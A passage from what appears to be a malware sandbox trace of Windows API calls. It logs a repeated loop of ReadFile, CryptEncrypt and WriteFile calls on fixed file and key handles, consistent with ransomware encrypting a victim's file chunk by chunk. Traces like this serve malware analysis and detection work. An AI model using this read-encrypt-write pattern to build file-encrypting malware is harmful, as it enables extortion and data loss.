lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.307] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.307] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.308] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.308] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.308] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.308] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.308] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.308] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.308] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.308] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.308] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.308] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.308] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.308] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.309] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.309] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.309] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.309] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.309] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.310] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.310] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.310] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.310] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.310] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.310] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.310] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.310] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.310] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.310] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.310] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.310] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.311] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.311] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.311] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.311] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.311] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.311] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.311] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.311] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.311] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.311] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.311] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.311] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.311] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.312] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.312] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.312] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.312] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.312] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.312] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.313] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.313] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.313] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.313] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.313] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.313] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.313] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.313] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.313] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.313] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.313] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.313] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.314] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.314] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.314] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.314] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.314] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.314] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.314] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.314] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.314] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.314] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.314] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.314] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.315] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.315] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.315] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] CryptEncrypt (in: hKey=0x2fc208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d5b8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.315] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d5b8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.315] ReadFile (in: hFile=0x5d68, lpBuffer=0x2f5d5b8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d5b8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.316] 